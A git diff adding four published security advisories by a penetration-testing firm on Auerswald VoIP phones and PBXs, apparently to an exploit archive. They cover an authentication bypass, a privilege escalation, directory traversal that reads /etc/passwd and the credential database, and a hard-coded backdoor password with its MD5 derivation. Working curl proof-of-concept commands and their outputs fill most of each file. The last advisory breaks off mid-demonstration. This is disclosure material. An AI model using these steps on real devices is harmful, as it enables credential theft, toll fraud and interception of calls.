diff --git a/exploits/hardware/remote/50565.txt b/exploits/hardware/remote/50565.txt
new file mode 100644
index 000000000..b837d5ddc
--- /dev/null
+++ b/exploits/hardware/remote/50565.txt
@@ -0,0 +1,317 @@ +# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass +# Date: 06/12/2021 +# Exploit Author: RedTeam Pentesting GmbH +# Version: 1400/2600/3600 + +Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass + + +RedTeam Pentesting discovered a vulnerability in the web-based +configuration management interface of the Auerswald COMfortel 1400 and +2600 IP desktop phones. The vulnerability allows accessing configuration +data and settings in the web-based management interface without +authentication. + + +Details +======= + +Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP +Affected Versions: <= 2.8F +Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP) +Vulnerability Type: Authentication Bypass +Security Risk: high +Vendor URL: https://www.auerswald.de +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004 +Advisory Status: published +CVE: CVE-2021-40856 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 + + +Introduction +============ + +"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and +IP system phone), with 4.3" colour touch display and preconfigured +answering machine" + +(from the vendor's homepage) + + +More Details +============ + +During a penetration test it was discovened that several VoIP phones +(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow +accessing administrative functions without login credentials, bypassing +the authentication. This can be achieved by simply prefixing API +endpoints that require authentication with "/about/../", since the +"/about" endpoint does not require any authentication. + + +Proof of Concept +================ + +The phones run a web-based management interface on Port 80. If accessed, +the HTTP response code 401 together with a website redirecting to the +path "/statics/pageChallenge.html" is returned. 
This can for example be +seen using the command-line HTTP client curl[1] as follows: + +------------------------------------------------------------------------ +$ curl --include 'http://192.168.1.190/' +HTTP/1.1 401 Unauthorized +[...] + +
+------------------------------------------------------------------------ + +The website contains JavaScript code that requests the path +"/about?action=get" and loads a JSON document (formatted and shortened +to increase readability): + +------------------------------------------------------------------------ +$ curl --include 'http://192.168.1.190/about?action=get' + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Cache-Control: no-cache +Content-Length: 3673 +Date: Mon, 30 Aug 2021 08:39:24 GMT +Server: lighttpd + +{ + "DATA": { + "firmware": { + "TYPE": "DATAITEM", + "VALUE": "2.8E", + "KEY": "firmware" + }, + "serial": { + "TYPE": "DATAITEM", + "VALUE": "1234567890", + "KEY": "serial" + }, + [...] + } +} + +------------------------------------------------------------------------ + +Among other information, this JSON document contains the serial number +and firmware version displayed on the website. This action can be +accessed without authentication. Other endpoints require authentication, +for example the path "/tree?action=get", from which the menu structure +is loaded after successful authentication: + +------------------------------------------------------------------------ +$ curl --include 'http://192.168.1.190/tree?action=get' +HTTP/1.1 401 Unauthorized +[...] + + +------------------------------------------------------------------------ + +During the penetration test, it was discovered that this action can +successfully be requested by inserting the prefix "/about/../". 
In order +to prevent curl from normalizing the URL path, the option "--path-as-is" +must be supplied: + +------------------------------------------------------------------------ +$ curl --include --path-as-is \ + 'http://192.168.1.190/about/../tree?action=get' + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Cache-Control: no-cache +Content-Length: 3808 +Date: Mon, 30 Aug 2021 08:42:11 GMT +Server: lighttpd + +{ + "TYPE": "TREENODEPAGE", + "ITEMS": { + "COUNT": 2, + "TYPE": "ITEMLIST", + "1": { + "id": 31, + "text": "applications_settings", + "TYPE": "TREENODEPAGE", + "ITEMS": { + "COUNT": 1, + "TYPE": "ITEMLIST", + "0": { + "target": "pageFunctionkeys.html", + "id": 32, + "action": "/functionkeys", + "text": "key_app", + "pagename": "Functionkeys", + "TYPE": "TREENODEPAGE" + } + } + }, + [...] + } +} +------------------------------------------------------------------------ + +The endpoint "/account" allows listing account data: + +------------------------------------------------------------------------ +$ curl --include --path-as-is \ + 'http://192.168.1.190/about/../account?action=list' + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Cache-Control: no-cache +Content-Length: 793 +Date: Mon, 30 Aug 2021 08:43:33 GMT +Server: lighttpd + +{ + "DATA": { + [...] + "accountList0": { + "KEY": "accountList0", + "COUNT": 1, + "TYPE": "DATAMODEL", + "VALUE": { + "0": { + "ID": 32327, + "PARENTID": 0, + "PROVIDER": "ProviderName", + "NAME": "123 Example User", + "STATUS": 4, + "DEFAULT": 1 + } + }, + [...] 
+ }, + } +} +------------------------------------------------------------------------ + +The ID 32327 can then be used to get details about that particular +account, including the username and password: + +------------------------------------------------------------------------ +$ curl --include --path-as-is \ + 'http://192.168.1.190/about/../account?action=get&itemID=32327' + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Cache-Control: no-cache +Content-Length: 2026 +Date: Mon, 30 Aug 2021 08:44:13 GMT +Server: lighttpd + +{ + "DATA": { + [...] + "Benutzer": { + "TYPE": "DATAITEM", + "VALUE": "123", + "KEY": "Benutzer" + }, + "Passwort": { + "TYPE": "DATAITEM", + "VALUE": "secret", + "KEY": "Passwort" + }, + [...] + } +} +------------------------------------------------------------------------ + +Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to +access and use the web-based management interface as if regular login +credentials were presented. + +It is likely that other functionality can be accessed in the same way, +to for example change settings or activate the integrated option for +recording the Ethernet traffic. + + +Workaround +========== + +Disable the web-based management interface if possible. + + +Fix +=== + +Upgrade to a firmware version which corrects this vulnerability. + + +Security Risk +============= + +Inserting the prefix "/about/../" allows bypassing the authentication +check for the web-based configuration management interface. This enables +attackers to gain access to the login credentials used for +authentication at the PBX, among other data. + +Attackers can then authenticate at the PBX as the respective phone and +for example call premium rate phone lines they operate to generate +revenue. They can also configure a device they control as the PBX in the +phone, so all incoming and outgoing phone calls are intercepted and can +be recorded. 
The device also contains a function to record all Ethernet +data traffic, which is likely affected as well. + +Overall, the vulnerability completely bypasses the authentication for +the web-based management interface and therefore poses a high risk. + + +References +========== + +[1] https://curl.se +[2] https://github.com/zaproxy/zaproxy/ + +Timeline +======== + +2021-08-26 Vulnerability identified +2021-09-01 Customer approved disclosure to vendor +2021-09-10 Vendor notified +2021-09-10 CVE ID requested +2021-09-10 CVE ID assigned +2021-10-04 Vendor provides access to device with fixed firmware +2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected +2021-10-14 Vendor releases corrected firmware version 2.8G +2021-12-06 Advisory published + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file 
diff --git a/exploits/hardware/remote/50567.txt b/exploits/hardware/remote/50567.txt
new file mode 100644
index 000000000..08045a1f3
--- /dev/null
+++ b/exploits/hardware/remote/50567.txt
@@ -0,0 +1,301 @@ +# Exploit Title: Auerswald COMpact 8.0B - Privilege Escalation +# Date: 06/12/2021 +# Exploit Author: RedTeam Pentesting GmbH + +Advisory: Auerswald COMpact Privilege Escalation + + +RedTeam Pentesting discovered a vulnerability in the web-based +management interface of the Auerswald COMpact 5500R PBX which allows +low-privileged users to access passwords of administrative user accounts. + + +Details +======= + +Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19") +Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)) +Fixed Versions: 8.2B +Vulnerability Type: Privilege Escalation +Security Risk: high +Vendor URL: https://www.auerswald.de/en/product/compact-5500r +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005 +Advisory Status: published +CVE: CVE-2021-40857 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857 + + +Introduction +============ + +"Fully modular VoIP appliance for more efficient communication processes +With the COMpact 5500R, you are originally equipped for everyday +business - now and in the future. + +The fully modular architecture with 80 IP channels and all the functions +of a large ITC server allows up to 112 subscribers and thus scales with +your company. + +Continuous maintanance and expansion of the system software makes this +versatile IP server a future-proof investment in any business +communication." + +(from the vendor's homepage) + + +More Details +============ + +Attackers with low-privileged user accounts, for example those that are +used by VoIP phones, can log into the web-based management interface of +the COMpact 5500R PBX. Afterwards, the list of user accounts can be +listed and details shown for each user account. 
Adding the URL parameter +"passwd=1" then also includes the clear text password for each user +account, including administrative ones, which can then be used to +authenticate against the management interface. + + +Proof of Concept +================ + +The command-line HTTP client curl[1] can be used as follows to log in +with the username "123" and the password "secret" (shortened and +formatted to increase readability): + +------------------------------------------------------------------------ +$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/ +[...] + +[ + { + "login": 1, + "userId": 1234, + "userRufNr": "123", + "userName": "123", + "pbxType": 35, + "pbxId": 0, + "pbx": "COMpact 5500R", + "pbxEdit": "Comp.5500R", + "isActivated": 1, + "dongleTnCount": 112, + "currentConfig": 34, + "cur": "EUR", + "language": 0, + "hidePrivat": 1, + "offlineConfig": false + }, + [...] +] +------------------------------------------------------------------------ + +The server returns a JSON document describing the user account as well +as a session ID in a cookie. This session ID can then be used to access +other API endpoints on the PBX. The following listing shows the request to +the path "/logstatus_state", which returns the current access level: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ + https://192.168.1.2/logstatus_state + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +{"logstatus":"Teilnehmer"} +------------------------------------------------------------------------ + +The access level in this case is "Teilnehmer" (member). 
+ +The list of all other users can be requested as follows: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ + https://192.168.1.2/cfg_data_teilnehmer + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +[ +[...] +{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false}, +[...] +{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true} +[...] +] +------------------------------------------------------------------------ + +Two user accounts are shown in the listing above: the current user's +account with the ID 1234 and a different user account with so-called +"sub-admin" privileges with the ID 2222. + +Details about a particular user account with a given ID can be requested +like this: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ + 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234' + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +{"rufnr":"123","name":"Example User",[...], +"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX", +[...], "isSubadmin":0,[...]} +------------------------------------------------------------------------ + +In the returned JSON document, the values of the fields for the PIN, +token and password are replaced by "XXX". But if the URL parameter +"passwd" is set to the value 1, the values are returned in plain text: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ + 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1' + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] 
+ +{"rufnr":"123","name":"Example User",[...], +"privatPin":"12345678","privatPass":"secretpassword", +"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]} +------------------------------------------------------------------------ + +This can be repeated for other user accounts, for example for the +user account with the ID 2222 shown it the listing earlier. The server +returns the plain text password for the other user account: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ + 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1 + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999", +"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz", +[...],"isSubadmin":1,[...]} +------------------------------------------------------------------------ + +The password can then be used to log into the PBX with the other user +account: + +------------------------------------------------------------------------ +$ curl --anyauth --user sub-admin:verysecretpassword --include \ + https://192.168.1.2/tree + +[...] +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/ +[...] + +[{"login":2,"userId":2222,[...]}] +------------------------------------------------------------------------ + +Checking the access level with the new session ID shows that the user is +now logged in with an administrative account: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ + https://192.168.1.2/logstatus_state + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] 
+ +{"logstatus":"Sub-Administrator"}% +------------------------------------------------------------------------ + + +Workaround +========== + +Disable or restrict access to the web-based management interface if +possible. + + +Fix +=== + +Upgrade to a firmware version which corrects this vulnerability. + + +Security Risk +============= + +Attackers who have acquired access to a low-privileged user account, for +example by extracting such an account from a VoIP phone, can log into +the web-based management interface of the COMpact 5500R PBX and access +clear text passwords for other user accounts, including those with the +"sub-admin" privilege. After logging in with these newly acquired +credentials, attackers can access configuration settings and most other +functions. + +They can then for example create new SIP credentials and use them to +call premium rate phone lines they operate to generate revenue. They can +monitor and even redirect all incoming and outgoing phone calls and +record all Ethernet data traffic. + +Due to the severe and far-reaching consequences and despite the +prerequisite of having to know an existing low-privilege user account, +this vulnerability rated as a high risk. + + +Timeline +======== + +2021-08-26 Vulnerability identified +2021-09-01 Customer approved disclosure to vendor +2021-09-10 Vendor notified +2021-09-10 CVE ID requested +2021-09-10 CVE ID assigned +2021-10-05 Vendor provides access to device with fixed firmware +2021-10-11 Vendor provides fixed firmware +2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected +2021-12-06 Advisory published + + +References +========== + +[1] https://curl.se/ + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. 
+ +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/hardware/remote/50568.txt b/exploits/hardware/remote/50568.txt new file mode 100644 index 000000000..901c60a3c --- /dev/null +++ b/exploits/hardware/remote/50568.txt 
@@ -0,0 +1,302 @@ +# Exploit Title: Auerswald COMpact 8.0B - Arbitrary File Disclosure +# Date: 06/12/2021 +# Exploit Author: RedTeam Pentesting GmbH + +Advisory: Auerswald COMpact Arbitrary File Disclosure + + +RedTeam Pentesting discovered a vulnerability in the web-based +management interface of the Auerswald COMpact 5500R PBX which allows +users with the "sub-admin" privilege to access any files on the PBX's +file system. + + +Details +======= + +Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19") +Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)) +Fixed Versions: 8.2B +Vulnerability Type: Arbitrary File Disclosure +Security Risk: medium +Vendor URL: https://www.auerswald.de/en/product/compact-5500r +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006 +Advisory Status: published +CVE: CVE-2021-40858 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858 + + +Introduction +============ + +"Fully modular VoIP appliance for more efficient communication processes +With the COMpact 5500R, you are originally equipped for everyday +business - now and in the future. + +The fully modular architecture with 80 IP channels and all the functions +of a large ITC server allows up to 112 subscribers and thus scales with +your company. + +Continuous maintanance and expansion of the system software makes this +versatile IP server a future-proof investment in any business +communication." + +(from the vendor's homepage) + + +More Details +============ + +RedTeam Pentesting discovered that attackers with administrative access +to the PBX's web-based management interface (as a so-called "sub-admin") +can download arbitrary files from the PBX's file system. 
This includes +the usually not accessible configuration database which contains the +password for the highly privileged "Admin" user in clear text. + + +Proof of Concept +================ + +The command-line HTTP client curl[1] can be used to log into the +management interface of the PBX with the username "sub-admin" and the +password "verysecretpassword" as follows: + +------------------------------------------------------------------------ +$ curl --anyauth --user sub-admin:verysecretpassword --include \ + https://192.168.1.2/tree + +[...] +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/ +[...] + +[{"login":2,"userId":2222,[...]}] +------------------------------------------------------------------------ + +The server returns a session ID in a cookie which is then used to check +the access level: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ + https://192.168.1.2/logstatus_state + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +{"logstatus":"Sub-Administrator"} +------------------------------------------------------------------------ + +In the PBX's user management, the access level "Sub-Administrator" is +used for user accounts who should be able to configure the PBX. There +are also other, higher-level access privileges. + +Users with the "sub-admin" privilege can configure music on hold (MOH, +"Wartemusik"), and for example listen to the currently configured music. +In order to do this, the browser requests the music files from the PBX. 
+ +The file "alarm1.wav" can be accessed with curl as follows: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ +'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\ +'&pageindex=1' + +HTTP/1.1 200 OK +Content-Type: audio/x-wav; charset= +Content-Length: 132192 +Content-disposition: attachment; filename="alarm1.wav" +[...] +------------------------------------------------------------------------ + +It was found that the PBX allows directory traversal with the string +"../", so the file "/etc/passwd" can be accessed as follows: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ +'https://192.168.1.2/wartemusik_verwaltung_play?'\ +'fileName=../../etc/passwd&pageindex=' + +HTTP/1.1 200 OK +[...] +Content-Length: 113 +Content-disposition: attachment; filename="../../etc/passwd" +[...] + +root::0:0:root:/root:/bin/sh +netstorage::1:1::/data/ftpd:/bin/false +web::2:2::/opt/auerswald/lighttpd:/bin/false +------------------------------------------------------------------------ + +The same issue is present in the function for managing logos. A regular +request for the file "logo1.jpg" is shown below: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ +'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424' + +HTTP/1.1 200 OK +X-XSS-Protection: 1 +Content-Type: image/jpg; charset=UTF-8 +Content-Length: 13986 +Content-disposition: attachment; filename="logo1.jpg" +[...] 
+------------------------------------------------------------------------ + +In a similar fashion as before, the file "/etc/passwd" can be accessed: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ +'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd' + +HTTP/1.1 200 OK +[...] + +root::0:0:root:/root:/bin/sh +netstorage::1:1::/data/ftpd:/bin/false +web::2:2::/opt/auerswald/lighttpd:/bin/false +------------------------------------------------------------------------ + +For attackers, an interesting file is the SQLite[2] database file +"/data/db/pbx4.db". It can be downloaded as follows: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\ +'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \ + > pbx4.db + + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305 +------------------------------------------------------------------------ + +This file contains the password for the highly privileged "Admin" user +account: + +------------------------------------------------------------------------ +$ sqlite3 pbx4.db +SQLite version 3.27.2 2019-02-25 16:06:06 +Enter ".help" for usage hints. + +sqlite> .tables +DbFileVersion PbxMisc + +sqlite> select * from PbxMisc; +[...] +AdminPasswdHash| +AdminLogin|Admin +AdminPin|43214321 +AdminPasswd|S3kr1t! +------------------------------------------------------------------------ + +The username and password can then be used to log into the web +application: + +------------------------------------------------------------------------ +$ curl --user 'Admin:S3kr1t!' 
--anyauth --include \ + https://192.168.1.2/tree + +HTTP/1.1 200 OK +Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/ +[...] + +[{"login":3,"userId":0,"userName":"",[...]}] +------------------------------------------------------------------------ + +Checking the access level reveals the new privilege: + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \ + https://192.168.1.2/logstatus_state + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +{"logstatus":"Administrator"} +------------------------------------------------------------------------ + +The user "Admin", in contrast to regular administrative users +("sub-admin"), can access more functions and for example apply firmware +updates. + +Workaround +========== + +Disable or restrict access to the web-based management if possible. + + +Fix +=== + +Upgrade to a firmware version which corrects this vulnerability. + + +Security Risk +============= + +Attackers who already have acquired administrative access as a so-called +"sub-admin" can download a database file and access the password for the +highly privileged "Admin" account. This account can use more functions and +is allowed to apply firmware updates. + +On the one hand, exploiting this vulnerability already requires +administrative access. On the other hand, attackers can reach +high-privileged access to the PBX and use functions not available to +"sub-admin" users, like firmware updates. All in all, this vulnerability +is therefore rated to have a medium risk potential. 
+ + +Timeline +======== + +2021-08-26 Vulnerability identified +2021-09-01 Customer approved disclosure to vendor +2021-09-10 Vendor notified +2021-09-10 CVE ID requested +2021-09-10 CVE ID assigned +2021-10-05 Vendor provides access to device with fixed firmware +2021-10-11 Vendor provides fixed firmware +2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected +2021-12-06 Advisory published + + +References +========== + +[1] https://curl.se +[2] https://www.sqlite.org + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/hardware/remote/50569.txt b/exploits/hardware/remote/50569.txt new file mode 100644 index 000000000..a5fc22684 --- /dev/null +++ b/exploits/hardware/remote/50569.txt 
@@ -0,0 +1,350 @@ +# Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors +# Date: 06/12/2021 +# Exploit Author: RedTeam Pentesting GmbH + +Advisory: Auerswald COMpact Multiple Backdoors + + +RedTeam Pentesting discovered several backdoors in the firmware for the +Auerswald COMpact 5500R PBX. These backdoors allow attackers who are +able to access the web-based management application full administrative +access to the device. + + +Details +======= + +Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19") +Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP) +Fixed Versions: 8.2B, 4.0T +Vulnerability Type: Backdoor +Security Risk: high +Vendor URL: https://www.auerswald.de/en/product/compact-5500r +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007 +Advisory Status: published +CVE: CVE-2021-40859 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859 + + +Introduction +============ + +"Fully modular VoIP appliance for more efficient communication processes +With the COMpact 5500R, you are originally equipped for everyday +business - now and in the future. + +The fully modular architecture with 80 IP channels and all the functions +of a large ITC server allows up to 112 subscribers and thus scales with +your company. + +Continuous maintanance and expansion of the system software makes this +versatile IP server a future-proof investment in any business +communication." + +(from the vendor's homepage) + + +More Details +============ + +Two backdoor passwords were found in the firmware of the COMpact 5500R +PBX. 
One backdoor password is for the secret user "Schandelah", the +other can be used for the highest-privileged user "Admin". No way was +discovered to disable these backdoors. + + +Proof of Concept +================ + +The firmware for the COMpact 5500R can be downloaded from the vendor's +homepage[1]. The following details refer to firmware version 7.8A, but +the latest firmware at the time of writing (8.0B) is affected as well. + +Inspecting the downloaded file reveals that it is compressed and can be +extracted with the program "gunzip": + +------------------------------------------------------------------------ +$ file 7_8A_002_COMpact5500.rom +7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23 +15:04:43 2020, from Unix, original size 196976698 + +$ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz + +$ gunzip 7_8A_002_COMpact5500.gz +------------------------------------------------------------------------ + +Analysing the resulting file again shows that it is an image file in the +format required by the bootloader "Das U-Boot"[2], a popular bootloader +for embedded devices: + +------------------------------------------------------------------------ +$ file 7_8A_002_COMpact5500.rom + +7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM, +Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38 +2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0 +xCECA93E8, Data CRC: 0x99E65DF1 +------------------------------------------------------------------------ + +The program "dumpimage" (included with u-boot) can be used to list the +partitions in the image file: + +------------------------------------------------------------------------ +$ dumpimage -l 7_8A_002_COMpact5500.rom +Image Name: +CP5500 125850 +Created: +Wed Sep 23 17:04:38 2020 +Image Type: +ARM Linux Multi-File Image (uncompressed) +Data Size: +196976634 Bytes = 192359.99 KiB = 187.85 MiB +Load Address: 00000000 +Entry Point: 
00000000 +Contents: +Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB +Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB +------------------------------------------------------------------------ + +The larger partition then was extracted into the file "rootfs" as +follows: + +------------------------------------------------------------------------ +$ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs +------------------------------------------------------------------------ + +Contained in the file is an ext2-compatible file system, which was +mounted at "/mnt" and inspected: + +------------------------------------------------------------------------ +$ file rootfs + +rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca- +f302d7f20ef1, volume name "7.8A_002_125850." + +$ sudo mount -o loop,ro rootfs /mnt + +$ cat /mnt/etc/passwd +root::0:0:root:/root:/bin/sh +netstorage::1:1::/data/ftpd:/bin/false +web::2:2::/opt/auerswald/lighttpd:/bin/false +------------------------------------------------------------------------ + +The PBX runs the web server lighttpd[3], the configuration files can be +found in the folder "/opt/auerswald/lighttpd". The web server forwards +most requests via FastCGI to the program "/opt/auerswald/web/webserver". +This program can then be analysed, for example using the reverse +engineering program Ghidra[4]. + +The manual for the PBX reveals that in order to manage the device, users +need to log in with the username "sub-admin". When this string is +searched within the program in Ghidra, the function which checks +passwords on login can be identified. + +It can easily be seen that besides the username "sub-admin" the function +also checks for the hard-coded username "Schandelah", which is the +village of Auerswald's headquarter. 
Further analysis revealed that the +corresponding password for this username is derived by concatenating the +PBX's serial number, the string "r2d2" and the current date, hashing it +with the MD5 hash algorithm and taking the first seven lower-case hex +chars of the result. + +All data needed to derive the password can be accessed without +authentication by requesting the path "/about_state", which is also used +on the website the PBX redirects users to who abort the password prompt +(shortened and formatted to increase readability): + +------------------------------------------------------------------------ +$ curl --include https://192.168.1.2/about_state +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +{ + "pbx": "COMpact 5500R", + "pbxType": 35, + "pbxId": 0, + "version": "Version 7.8A - Build 002 ", + "serial": "1234123412", + "date": "30.08.2021", + [...] +} +------------------------------------------------------------------------ + +The password can be derived as follows: + +------------------------------------------------------------------------ +$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}' +1432d89 +------------------------------------------------------------------------ + +This password can then be used for authentication: + +------------------------------------------------------------------------ +$ curl --include --user 'Schandelah:1432d89' --anyauth \ + https://192.168.1.2/tree + +HTTP/1.1 302 Found +Location: /statics/html/page_servicetools.html 